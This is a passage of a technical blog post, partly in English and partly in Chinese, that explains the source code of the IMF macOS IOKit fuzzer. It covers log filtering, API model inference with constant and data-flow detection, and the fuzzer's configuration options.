class="line">    <span class="string">&#x27;size&#x27;</span> : <span class="number">0x80</span>,</span><br><span class="line">    <span class="string">&#x27;cnt&#x27;</span>:<span class="number">0x1</span>, </span><br><span class="line">    <span class="string">&#x27;data&#x27;</span>:[]</span><br><span class="line">  &#125;,</span><br><span class="line">]</span><br><span class="line"></span><br><span class="line">OUT </span><br><span class="line">[</span><br><span class="line">  <span class="string">&#x27;IORegistryEntryGetLocationInPlane&#x27;</span>,</span><br><span class="line">  &#123;</span><br><span class="line">    
<span class="string">&#x27;name&#x27;</span>:<span class="string">&#x27;ret&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;value&#x27;</span>: <span class="number">0xe00002f0</span>,</span><br><span class="line">    <span class="string">&#x27;size&#x27;</span> : <span class="number">0x4</span>,</span><br><span class="line">    <span class="string">&#x27;cnt&#x27;</span>:<span class="number">0x1</span>, </span><br><span class="line">    <span class="string">&#x27;data&#x27;</span>:[]</span><br><span class="line">  &#125;,</span><br><span class="line">]</span><br></pre></td></tr></table></figure><p>Note that the API hook produces two entries for every IOKit function call:</p><ul><li>an <strong>IN entry</strong>, which records the arguments passed in;</li><li>an <strong>OUT entry</strong>, which records what the call returned.</li></ul><h3 id="2-Inferrer">2. Inferrer</h3><h4 id="a-Log-Filtering">a. Log Filtering</h4><h5 id="1-论文细节">1) Paper details</h5><p>Each run of the target program can produce a different log depending on the environment, so IMF filters and post-processes the generated logs.</p><p>The goal of Log Filtering is to <strong>select the N logs with the longest common prefix</strong> from the given set, and to collect the <strong>common prefix</strong> of those N logs, thereby <strong>building a set S of API call sequences that have exactly the same order and the same number of calls</strong>.</p><p>Because the logs in S were recorded under different conditions, some parameters take different values across logs; this variation can be used to pin down the API model more precisely.</p><h5 id="2-技术细节">2) Technical details</h5><p>The filtering logic lives in <code>filter.py</code>.</p><ul><li><p>First, filter reads every log file in a loop and hashes each IN/OUT entry pair in every log file.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">loader</span>(<span class="params">path</span>):</span><br><span class="line">    ret = 
[]</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(path, <span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        data = f.read().split(<span class="string">&#x27;\n&#x27;</span>)[:-<span class="number">1</span>]</span><br><span class="line">    idx = <span class="number">0</span></span><br><span class="line">    <span class="keyword">while</span> idx &lt; <span class="built_in">len</span>(data):</span><br><span class="line">        name = parse_name(data[idx])</span><br><span class="line">        selector = parse_selector(data[idx])</span><br><span class="line">        hval = merge(name, selector)</span><br><span class="line">        ret.append(hval)</span><br><span class="line">        idx += <span class="number">2</span></span><br><span class="line">    <span class="keyword">return</span> path, ret</span><br></pre></td></tr></table></figure><p>When hashing a log entry, the input is the <strong>function name + selector</strong> (the merge operation). The selector is only used when the function name is <code>IOConnectCallXXXXMethod</code>. In other words, the hash tells apart calls that have <strong>the same CallMethod function name but a different selector</strong>.</p><p>The result of hashing is <strong>an array</strong> of <strong>tuples</strong>. Each tuple has two members: the name of one log file, and an array holding the hash of every entry in that log file:</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">[</span></span><br><span class="line">    &#x27;log1.txt&#x27;<span class="punctuation">,</span> <span class="punctuation">[</span></span><br><span class="line">        entry1_hash<span class="punctuation">,</span></span><br><span class="line">        entry2_hash<span class="punctuation">,</span></span><br><span 
class="line">        ....</span><br><span class="line">    <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">    ....</span><br><span class="line"><span class="punctuation">]</span></span><br></pre></td></tr></table></figure></li><li><p>The output of the step above is called a <strong>group</strong>. Next, filter runs the categorize function, which walks the log-entry hash at a given index in every log of groups. The purpose is to select logs by their <strong>longest common prefix</strong> (the hashes are compared position by position from the start, so this is a prefix rather than a general subsequence).</p><p>After each pass, logs whose hash at the same idx differs are split apart and merged into new groups.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">categorize</span>(<span class="params">groups, idx</span>):</span><br><span class="line">    ret = []</span><br><span class="line">    <span class="keyword">for</span> group <span class="keyword">in</span> groups:</span><br><span class="line">        tmp = &#123;&#125;</span><br><span class="line">        <span class="keyword">for</span> fn, hvals <span class="keyword">in</span> group:</span><br><span class="line">            hval = get(hvals, idx)</span><br><span class="line">            <span class="keyword">if</span> hval <span class="keyword">not</span> <span class="keyword">in</span> tmp:</span><br><span class="line">                tmp[hval] = []</span><br><span class="line">            tmp[hval].append((fn, hvals))</span><br><span class="line">        <span class="keyword">for</span> hval <span class="keyword">in</span> tmp:</span><br><span class="line">            <span 
class="keyword">if</span> hval != <span class="literal">None</span> :</span><br><span class="line">                ret.append(tmp[hval])</span><br><span class="line">    <span class="keyword">return</span> ret</span><br></pre></td></tr></table></figure></li><li><p>Each time the logs have been split and merged into new groups, pick_best is attempted: it walks every group in groups and returns the log entries of a group that contains at least N logs.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">find_best</span>(<span class="params">groups, n</span>):</span><br><span class="line">    before = <span class="literal">None</span></span><br><span class="line">    idx = <span class="number">0</span></span><br><span class="line">    <span class="keyword">while</span> <span class="built_in">len</span>(groups) != <span class="number">0</span>:</span><br><span class="line">        before = groups</span><br><span class="line">        groups = categorize(groups, idx)</span><br><span class="line">        <span class="keyword">if</span> pick_best(groups, n) == <span class="literal">None</span>:</span><br><span class="line">            <span class="keyword">return</span> pick_best(before, n), idx</span><br><span class="line">        idx += <span class="number">1</span></span><br><span class="line">    utils.error(<span class="string">&#x27;find_best error&#x27;</span>)</span><br></pre></td></tr></table></figure><p>If such a group exists, the filtering is not yet exhausted, so idx is incremented and filtering continues. If none exists, the result of the previous round is restored, a group with at least N logs is picked from it, and the current idx is returned as the prefix length. (Note that a single group holds several log files.)</p></li><li><p>Following the steps above, filter can then select and save multiple log files, each truncated to <strong>a sequence of length idx (note that these idx 
entries are the common prefix)</strong>.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">save_best</span>(<span class="params">path, best_group, idx</span>):</span><br><span class="line">    <span class="keyword">for</span> fn, _ <span class="keyword">in</span> best_group:</span><br><span class="line">        name = fn.split(<span class="string">&#x27;/&#x27;</span>)[-<span class="number">1</span>]</span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(fn, <span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">            data = f.read().split(<span class="string">&#x27;\n&#x27;</span>)[:-<span class="number">1</span>]</span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(os.path.join(path, name), <span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">            <span class="keyword">for</span> x <span class="keyword">in</span> data[:idx*<span class="number">2</span>]:</span><br><span class="line">                f.write(x+<span class="string">&#x27;\n&#x27;</span>)</span><br></pre></td></tr></table></figure></li></ul><h4 id="b-API-Model-Inference">b. 
API Model Inference</h4><h5 id="1-论文细节-2">1) Paper details</h5><p>The paper does no special processing for the <strong>ordering dependencies</strong> between APIs. It optimistically assumes that calls between API functions follow the same order as in the filtered call sequences S.</p><p>For the data dependencies between APIs, the paper splits detection into two steps:</p><ol><li>Identify all constants.</li><li>Identify the data flow between a pair of functions.</li></ol><p>First comes <strong>constant identification</strong>. For a given function call in one call sequence, a <strong>constant argument</strong> must have the same value in the other call sequences too (that is, in all N filtered sequences). Take this example:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Sequence 1</span></span><br><span class="line">[...]</span><br><span class="line"><span class="comment">/* i-th call */</span> <span class="built_in">A</span>(var<span class="number">1</span>, <span class="number">12</span>);</span><br><span class="line">[...]</span><br><span class="line"></span><br><span class="line"><span class="comment">// Sequence 2</span></span><br><span class="line">[...]</span><br><span class="line"><span class="comment">/* i-th call */</span> <span class="built_in">A</span>(var<span class="number">2</span>, <span class="number">12</span>);</span><br><span class="line">[...]</span><br></pre></td></tr></table></figure><p>For the i-th call in the different sequences, the second argument is always the same value, 12, so the second argument of function A can be treated as a constant.</p><p>That is, let $S^k_{i, j}$ be the <strong>$i$-th argument</strong> of the <strong>$j$-th function call</strong> in the <strong>$k$-th call sequence</strong>. If $S^1_{i, j}=S^2_{i, j}=\dots=S^N_{i, j}$, then $S_{i,j}$ is a <strong>constant argument</strong>.</p><p>Note that constant identification <strong>must ignore handle types</strong>: variables of such types are not constants even when their values happen to be equal.</p><p>Next comes <strong>data-flow identification</strong>. <strong>IMF does not identify data flow from one argument to another argument</strong> (unlike syzkaller); it only identifies data flows of the form <strong>return value of function 1 -&gt; argument of function 2</strong> 
的数据流关系：</p><ul><li>对于某个指定函数调用点的<strong>输入参数值</strong>，若该调用点前有<strong>任何一个函数的返回值</strong>与输入参数值相同，则说明这之中存在数据流依赖关系。</li><li>如果有多个函数的返回值与输入参数值相同，则始终选择最近的那个函数。</li></ul><p>需要注意的是，为了提高精度，IMF 会取<strong>每个调用序列</strong>中<strong>每个函数</strong>的数据流依赖<strong>交集</strong>。</p><p>而 inferrer 的最终输出是一个 C 语言的代码片段，即 AST 格式。其中，inferrrer 会根据顺序依赖来生成一系列的函数调用语句。对于每个函数调用，其函数参数将会根据类型来进行不同的填充：</p><ul><li>常量参数：使用调用序列里的常量值</li><li>非常量参数<ul><li>若与其他函数存在数据依赖，则声明一个变量，将输入参数与存在数据依赖的函数相连接</li><li>若不存在数据依赖，则随机选择一个该输入参数在日志中出现的值</li></ul></li></ul><h5 id="2-技术细节-2">2) 技术细节</h5><p>执行 inferrer 时，初始时，程序会先实例化 ApiFuzz 类，在该类的构造函数中执行 const.load_apis 函数，将先前准备好的 <strong>IOKit API 函数原型定义</strong> 读入内存，并以 <strong>Api 类</strong>的结构保存。单个 Api 类的结构如下所示：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment">以该例子为例</span></span><br><span class="line"><span class="comment">[(&#x27;kern_return_t&#x27;, &#x27;IOMasterPort&#x27;), </span></span><br><span class="line"><span class="comment">[(&#x27;mach_port_t&#x27;, &#x27;bootstrapPort&#x27;, &#123;&#125;), 
(&#x27;mach_port_t *&#x27;, &#x27;masterPort&#x27;, &#123;&#x27;IO&#x27;: &#x27;O&#x27;&#125;)]]</span></span><br><span class="line"><span class="comment">*/</span> </span><br><span class="line">IOMasterPort_Api_class = <span class="punctuation">&#123;</span></span><br><span class="line">    rtype<span class="punctuation">:</span>&#x27;kern_return_t&#x27;<span class="punctuation">,</span></span><br><span class="line">    rval<span class="punctuation">:</span> Arg_class <span class="punctuation">&#123;</span></span><br><span class="line">    type<span class="punctuation">:</span> &#x27;kern_return_t&#x27;<span class="punctuation">,</span></span><br><span class="line">      name<span class="punctuation">:</span> &#x27;ret&#x27;<span class="punctuation">,</span></span><br><span class="line">      opt<span class="punctuation">:</span> <span class="punctuation">&#123;</span><span class="punctuation">&#125;</span></span><br><span class="line">    <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">    name<span class="punctuation">:</span>&#x27;IOMasterPort&#x27;<span class="punctuation">,</span></span><br><span class="line">    args <span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">        Arg <span class="punctuation">&#123;</span></span><br><span class="line">            type<span class="punctuation">:</span> &#x27;mach_port_t&#x27;<span class="punctuation">,</span></span><br><span class="line">            name<span class="punctuation">:</span> &#x27;bootstrapPort&#x27;<span class="punctuation">,</span></span><br><span class="line">            opt<span class="punctuation">:</span> <span class="punctuation">&#123;</span><span class="punctuation">&#125;</span></span><br><span class="line">        <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">    Arg <span class="punctuation">&#123;</span></span><br><span 
class="line">            type<span class="punctuation">:</span> &#x27;mach_port_t *&#x27;<span class="punctuation">,</span></span><br><span class="line">            name<span class="punctuation">:</span> &#x27;masterPort&#x27;<span class="punctuation">,</span></span><br><span class="line">            opt<span class="punctuation">:</span> <span class="punctuation">&#123;</span>&#x27;IO&#x27;<span class="punctuation">:</span> &#x27;O&#x27;<span class="punctuation">&#125;</span></span><br><span class="line">        <span class="punctuation">&#125;</span></span><br><span class="line">    <span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>之后，程序会在 ApiFuzz 类的 make_model 成员函数中，以多进程方式执行 load_apilog 成员，将先前 hook 生成的 API log 读入内存。</p><p>注意到 API log 中每两个条目（即一对 IN/OUT 条目）对应的是一个 IOKit 函数调用的参数输入与函数返回，因此在 load_apilog 函数中，程序同样会以一对条目为单位读入 ApiLog 类中。每一个 ApiLog 的结构如下所示：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span 
class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">  io_registry_entry_t IORegistryGetRootEntry (mach_port_t masterPort)</span></span><br><span class="line"><span class="comment">  IN [&#x27;IORegistryGetRootEntry&#x27;,&#123;&#x27;name&#x27;:&#x27;masterPort&#x27;,&#x27;value&#x27;: 0x0,&#x27;size&#x27; : 0x4,&#x27;cnt&#x27;:0x1, &#x27;data&#x27;:[]&#125;,]</span></span><br><span class="line"><span class="comment">  OUT [&#x27;IORegistryGetRootEntry&#x27;,&#123;&#x27;name&#x27;:&#x27;ret&#x27;,&#x27;value&#x27;: 0x2903,&#x27;size&#x27; : 0x4,&#x27;cnt&#x27;:0x1, &#x27;data&#x27;:[]&#125;,]</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">ApiLog(派生自API) = <span class="punctuation">&#123;</span></span><br><span class="line">    <span class="comment">// 以下四个是 API 类中的字段</span></span><br><span class="line">    args<span class="punctuation">:</span>   xxxxx<span class="punctuation">,</span></span><br><span class="line">    name<span class="punctuation">:</span>  &#x27;IORegistryGetRootEntry&#x27;<span class="punctuation">,</span></span><br><span class="line">    rtype<span class="punctuation">:</span>  xxxxx<span class="punctuation">,</span></span><br><span class="line">    rval<span class="punctuation">:</span>  xxxxx<span class="punctuation">,</span></span><br><span class="line">    </span><br><span class="line">    api <span class="punctuation">:</span>   Api(IORegistryGetRootEntry)<span class="punctuation">,</span></span><br><span class="line">    args_dict<span class="punctuation">:</span> <span 
class="punctuation">&#123;</span></span><br><span class="line">        &#x27;masterPort&#x27;<span class="punctuation">:</span> Arg(IORegistryGetRootEntry_arg0)</span><br><span class="line">    <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">    hval<span class="punctuation">:</span> None<span class="punctuation">,</span></span><br><span class="line">    il<span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">        &#x27;masterPort&#x27;<span class="punctuation">:</span> ArgLog(派生自 Arg) <span class="punctuation">&#123;</span></span><br><span class="line">      <span class="comment">// 以下三个是 Arg 类的字段</span></span><br><span class="line">            type<span class="punctuation">:</span> &#x27;mach_port_t&#x27;<span class="punctuation">,</span></span><br><span class="line">            name<span class="punctuation">:</span> &#x27;masterPort&#x27;<span class="punctuation">,</span></span><br><span class="line">            opt<span class="punctuation">:</span> <span class="punctuation">&#123;</span><span class="punctuation">&#125;</span>，</span><br><span class="line"></span><br><span class="line">      arg<span class="punctuation">:</span> Arg(内部内容和上面三个字段一样)<span class="punctuation">,</span></span><br><span class="line">      log<span class="punctuation">:</span> <span class="punctuation">&#123;</span>&#x27;name&#x27;<span class="punctuation">:</span>&#x27;masterPort&#x27;<span class="punctuation">,</span>&#x27;value&#x27;<span class="punctuation">:</span> <span class="number">0x0</span><span class="punctuation">,</span>&#x27;size&#x27; <span class="punctuation">:</span> <span class="number">0x4</span><span class="punctuation">,</span>&#x27;cnt&#x27;<span class="punctuation">:</span><span class="number">0x1</span><span class="punctuation">,</span> &#x27;data&#x27;<span class="punctuation">:</span><span class="punctuation">[</span><span 
class="punctuation">]</span><span class="punctuation">&#125;</span></span><br><span class="line">      is_input <span class="punctuation">:</span> True<span class="punctuation">,</span></span><br><span class="line">        <span class="punctuation">&#125;</span></span><br><span class="line">    <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">    ol<span class="punctuation">:</span> <span class="punctuation">&#123;</span><span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">    rval_log<span class="punctuation">:</span> ArgLog <span class="punctuation">&#123;</span></span><br><span class="line">        <span class="comment">// 以下三个是 Arg 类的字段</span></span><br><span class="line">        type<span class="punctuation">:</span> &#x27;io_registry_entry_t&#x27;<span class="punctuation">,</span></span><br><span class="line">        name<span class="punctuation">:</span> &#x27;ret&#x27;<span class="punctuation">,</span></span><br><span class="line">        opt<span class="punctuation">:</span> <span class="punctuation">&#123;</span><span class="punctuation">&#125;</span>，</span><br><span class="line"></span><br><span class="line">        arg<span class="punctuation">:</span> Arg(内部内容和上面三个字段一样)<span class="punctuation">,</span></span><br><span class="line">      log<span class="punctuation">:</span> <span class="punctuation">&#123;</span>&#x27;name&#x27;<span class="punctuation">:</span>&#x27;ret&#x27;<span class="punctuation">,</span>&#x27;value&#x27;<span class="punctuation">:</span> <span class="number">0x2903</span><span class="punctuation">,</span>&#x27;size&#x27; <span class="punctuation">:</span> <span class="number">0x4</span><span class="punctuation">,</span>&#x27;cnt&#x27;<span class="punctuation">:</span><span class="number">0x1</span><span class="punctuation">,</span> &#x27;data&#x27;<span class="punctuation">:</span><span class="punctuation">[</span><span 
class="punctuation">]</span><span class="punctuation">&#125;</span></span><br><span class="line">      is_input <span class="punctuation">:</span> False<span class="punctuation">,</span></span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>之后，程序将所有读入的 API log 均存入 ApiFuzz 类中的 apisets 数组，并使用该数组创建 Model 类进行建模。有意思的是，在建模时，只会使用一个 log 文件。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Model</span>:</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, apisets</span>):</span><br><span class="line">        <span class="variable language_">self</span>.mapis = []</span><br><span class="line">        <span class="keyword">for</span> idx <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(apisets[<span class="number">0</span>])):</span><br><span class="line">            apilog = apisets[<span class="number">0</span>][idx]</span><br><span class="line">            <span class="variable language_">self</span>.mapis.append(Mapi(apilog, idx))</span><br><span class="line">        <span class="variable language_">self</span>.check_const(apisets)</span><br><span class="line">        <span class="variable language_">self</span>.add_dataflow(apisets)</span><br></pre></td></tr></table></figure><p>Model 类在初始化时，会将每个 apilog 都转换成 Mapi 类型的结构。 该结构的布局和 Api 类型有点类似：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">Mapi = <span class="punctuation">&#123;</span></span><br><span class="line">    api <span class="punctuation">:</span> Api(arglog.api)</span><br><span class="line">    idx <span class="punctuation">:</span> xx<span class="punctuation">,</span></span><br><span class="line">    il <span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">    &#x27;masterPort&#x27;<span class="punctuation">:</span> Marg(派生自 Arg) <span class="punctuation">&#123;</span></span><br><span class="line">      arg <span class="punctuation">:</span> arglog.arg<span class="punctuation">,</span></span><br><span class="line">          value <span class="punctuation">:</span> Mval <span class="punctuation">&#123;</span></span><br><span class="line">                value <span class="punctuation">:</span> xxx<span class="punctuation">,</span></span><br><span class="line">              const <span class="punctuation">:</span> xxx<span class="punctuation">,</span></span><br><span class="line">                dataflow = xxx<span 
class="punctuation">,</span></span><br><span class="line">              raw <span class="punctuation">:</span> xxx<span class="punctuation">,</span></span><br><span class="line">              ori <span class="punctuation">:</span> xxx<span class="punctuation">,</span></span><br><span class="line">              ty <span class="punctuation">:</span> xxx<span class="punctuation">,</span></span><br><span class="line">              ptr <span class="punctuation">:</span> xxx<span class="punctuation">,</span></span><br><span class="line">              name <span class="punctuation">:</span> xxx<span class="punctuation">,</span></span><br><span class="line">            <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">            is_in_flag <span class="punctuation">:</span> whether the data flows in (input argument)</span><br><span class="line">            name <span class="punctuation">:</span> name of the arg</span><br><span class="line">            </span><br><span class="line">            array_flag <span class="punctuation">:</span> whether the arg is a pointer to an array</span><br><span class="line">            data <span class="punctuation">:</span> the array contents, if the arg is an array</span><br><span class="line">            cnt <span class="punctuation">:</span> the array length, if the arg is an array</span><br><span class="line">        <span class="punctuation">&#125;</span></span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line">    ol <span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">        .....</span><br><span class="line">    <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>Once the conversion finishes, the check const step runs immediately to determine whether each value is a constant. If the argument is a <strong>pointer</strong>, the program runs check const separately on every element of the array it points to; if the argument is a <strong>non-pointer</strong>, it runs check const on the argument's value.</p><p>The check const step is quite simple: <strong>if the j-th argument of the i-th function call takes different values across the filtered API logs, it is a variable.</strong></p><p>After check const completes, the next step is add dataflow.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">add_dataflow</span>(<span class="params">self, apisets</span>):</span><br><span class="line">    <span class="keyword">for</span> apiset <span class="keyword">in</span> apisets:</span><br><span class="line">        before = &#123;&#125;</span><br><span class="line">        <span class="keyword">for</span> idx <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(apiset)):</span><br><span class="line">            apilog = apiset[idx]</span><br><span class="line">            mapi =<span class="variable language_">self</span>.mapis[idx]</span><br><span class="line">            mapi.add_dataflow(before, apilog)</span><br><span class="line">            update_before(before, apilog, mapi, idx)</span><br></pre></td></tr></table></figure><p>At the start, add_dataflow creates a dictionary named before, which records the values produced by earlier function calls. It then appends the argument value of each Marg in each Mapi to the raw array of the corresponding Mval, and finally calls the get_xxx_df functions to update the Mval's dataflow field, which identifies where that Mval's data comes from.</p><p>In this way, by traversing the apilogs multiple times, the program sets one-way data-flow relations on some Mvals in preparation for the code generation that follows.</p><h3 id="3-Fuzzer">3. Fuzzer</h3><h4 id="a-Fuzz-配置">a. 
Fuzz 配置</h4><p>fuzz 的配置主要有以下几种：</p><ol><li>T : 超时时间</li><li>I : 迭代次数</li><li>P : 变异概率</li><li>F : 固定位数，用于变异</li><li>R : 随机数种子。</li></ol><p>实际开源的代码模板如下所示，注意到这里并没有关于超时时间的设置，这可能是因为这部分代码没有开源：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">parse_args</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv)</span></span>&#123;</span><br><span class="line">    <span class="type">int</span> opt;</span><br><span class="line">    <span class="keyword">while</span> ((opt = <span class="built_in">getopt</span>(argc, argv, <span class="string">&quot;f:s:b:r:l:&quot;</span>)) != <span class="number">-1</span>)&#123;</span><br><span class="line">        <span class="keyword">switch</span>(opt)&#123;</span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;f&#x27;</span>:</span><br><span class="line">                log_file = 
optarg;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;s&#x27;</span>:</span><br><span class="line">                seed = <span class="built_in">parse_uint</span>(optarg);</span><br><span class="line">                set_seed = <span class="number">1</span>;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;b&#x27;</span>:</span><br><span class="line">                bitlen = <span class="built_in">parse_uint</span>(optarg);</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;r&#x27;</span>:</span><br><span class="line">                rate = <span class="built_in">parse_uint</span>(optarg);</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;l&#x27;</span>:</span><br><span class="line">                max_loop = <span class="built_in">parse_uint</span>(optarg);</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="keyword">default</span> :</span><br><span class="line">                <span class="built_in">help</span>();</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(log_file == <span class="literal">NULL</span> &amp;&amp; set_seed == <span class="number">0</span>)&#123;</span><br><span class="line">        <span class="built_in">help</span>();</span><br><span class="line">    &#125;</span><br><span 
